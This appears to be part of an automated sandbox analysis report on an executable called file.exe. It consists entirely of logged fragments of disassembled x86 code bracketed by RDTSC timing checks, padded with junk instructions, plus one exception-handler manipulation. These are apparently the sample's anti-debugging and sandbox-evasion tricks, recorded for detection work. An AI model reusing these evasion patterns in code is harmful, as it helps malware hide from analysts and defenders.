                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B750 second address: 105B756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050016 second address: 10500AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F0C5DC268A8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f nop 0x00000010 adc di, 4BECh 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F0C5DC268A8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 pushad 0x00000037 mov esi, dword ptr [ebp+122D3338h] 0x0000003d jmp 00007F0C5DC268B1h 0x00000042 popad 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a mov ebx, dword ptr [ebp+122D18F3h] 0x00000050 mov eax, dword ptr [ebp+122D05B9h] 0x00000056 push 00000000h 0x00000058 push ebx 0x00000059 call 00007F0C5DC268A8h 0x0000005e pop ebx 0x0000005f mov dword ptr [esp+04h], ebx 0x00000063 add dword ptr [esp+04h], 00000015h 0x0000006b inc ebx 0x0000006c push ebx 0x0000006d ret 0x0000006e pop ebx 0x0000006f ret 0x00000070 mov ebx, dword ptr [ebp+122D28FAh] 0x00000076 push FFFFFFFFh 0x00000078 mov bx, 041Ch 0x0000007c nop 0x0000007d push eax 0x0000007e pushad 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10559F1 second address: 10559F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057A04 second address: 1057A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0C5DC268A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058AA1 second address: 1058AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D4B8 second address: 108D4CF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0C5CC1AFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0C5CC1AFCBh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D4CF second address: 108D4DF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C5DBE21D6h 0x00000008 ja 00007F0C5DBE21D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094C67 second address: 1094C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F0C5CC1AFC6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094C82 second address: 1094C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094C86 second address: 1094C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094DF3 second address: 1094E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jbe 00007F0C5DBE21D6h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094F3C second address: 1094F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F0C5CC1AFC6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094F4B second address: 1094F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109509A second address: 10950A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10950A0 second address: 10950BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0C5DBE21D6h 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007F0C5DBE21DDh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BF53 second address: 104BF59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BF59 second address: 104BF93 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0C5DBE21DCh 0x00000008 jc 00007F0C5DBE21D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 or ecx, 385BC95Ch 0x00000019 push 00000004h 0x0000001b mov dword ptr [ebp+122D2B9Eh], eax 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 jmp 00007F0C5DBE21E4h 0x0000002a pop edi 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A5F9 second address: 109A61D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5CC1AFCCh 0x00000009 jmp 00007F0C5CC1AFD4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099D42 second address: 1099D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E89 second address: 1099E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099E90 second address: 1099EAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E0h 0x00000007 jbe 00007F0C5DBE21DEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099FF0 second address: 1099FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099FF4 second address: 109A00F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A00F second address: 109A015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A015 second address: 109A01D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A01D second address: 109A021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A2ED second address: 109A2F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E30C second address: 109E332 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C5CC1AFC6h 0x00000008 jmp 00007F0C5CC1AFD8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E332 second address: 109E336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E336 second address: 109E33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D8FE second address: 109D928 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F0C5DBE21DEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0C5DBE21E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D928 second address: 109D934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0C5CC1AFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D934 second address: 109D938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D938 second address: 109D93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109D93C second address: 109D94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jg 00007F0C5DBE21D6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DBFF second address: 109DC09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DC09 second address: 109DC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DC0D second address: 109DC29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DC29 second address: 109DC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109DDAA second address: 109DDC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCCh 0x00000007 jnp 00007F0C5CC1AFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jg 00007F0C5CC1AFC6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A55B5 second address: 10A55BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5B3F second address: 10A5B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCCh 0x00000007 js 00007F0C5CC1AFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0C5CC1AFD7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5B6E second address: 10A5B74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A610B second address: 10A6114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6114 second address: 10A611A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6695 second address: 10A669B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A669B second address: 10A669F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A669F second address: 10A66C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F0C5CC1AFD3h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A66C4 second address: 10A66C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A699B second address: 10A69D6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0C5CC1AFC6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F0C5CC1AFD2h 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jbe 00007F0C5CC1AFC6h 0x00000025 pushad 0x00000026 popad 0x00000027 jno 00007F0C5CC1AFC6h 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A69D6 second address: 10A69F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0C5DBE21E3h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6F8B second address: 10A6FB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0C5CC1AFD0h 0x00000008 pop edx 0x00000009 jg 00007F0C5CC1AFCCh 0x0000000f ja 00007F0C5CC1AFC6h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FB6 second address: 10A6FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0C5DBE21E4h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FCF second address: 10A6FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A6FD5 second address: 10A6FDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC8E1 second address: 10AC8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC8E7 second address: 10AC8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0C5DBE21DDh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC8F9 second address: 10AC8FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC8FF second address: 10AC915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5DBE21E2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC915 second address: 10AC946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0C5CC1AFD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC946 second address: 10AC959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007F0C5DBE21DEh 0x0000000b jo 00007F0C5DBE21D6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC959 second address: 10AC965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0C5CC1AFC6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC965 second address: 10AC97A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ADE7D second address: 10ADE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ADE81 second address: 10ADE90 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0C5DBE21D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ADE90 second address: 10ADE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0C5CC1AFC6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0CB0 second address: 10B0CBA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0C5DBE21D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0E04 second address: 10B0E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0E08 second address: 10B0E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0C5DBE21E9h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007F0C5DBE21DDh 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0FA6 second address: 10B0FD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0C5CC1AFD9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0FD9 second address: 10B0FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0C5DBE21D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B12EB second address: 10B1305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0C5CC1AFD4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B82FE second address: 10B8303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8717 second address: 10B871F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B871F second address: 10B872E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 js 00007F0C5DBE21DEh 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8B03 second address: 10B8B28 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C5CC1AFC6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0C5CC1AFD7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CBA second address: 10B8CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CC0 second address: 10B8CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CC4 second address: 10B8CDA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0C5DBE21D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F0C5DBE21D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CDA second address: 10B8CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CDE second address: 10B8CED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CED second address: 10B8D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5CC1AFCFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8D00 second address: 10B8D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8E6B second address: 10B8EBE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C5CC1AFD8h 0x00000008 jmp 00007F0C5CC1AFD2h 0x0000000d jns 00007F0C5CC1AFC8h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F0C5CC1AFD3h 0x0000001b jmp 00007F0C5CC1AFD8h 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B90AE second address: 10B90C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0C5DBE21DAh 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B90C1 second address: 10B90DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5CC1AFD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9EEE second address: 10B9EFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C5DBE21D6h 0x00000008 jp 00007F0C5DBE21D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9EFE second address: 10B9F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD895 second address: 10BD899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2CB5 second address: 10C2CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2CBB second address: 10C2CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2E72 second address: 10C2E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0C5CC1AFC6h 0x0000000a jnp 00007F0C5CC1AFC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2E84 second address: 10C2E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2E89 second address: 10C2EAA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C5CC1AFCEh 0x00000008 jo 00007F0C5CC1AFC6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edx 0x00000011 jmp 00007F0C5CC1AFCEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
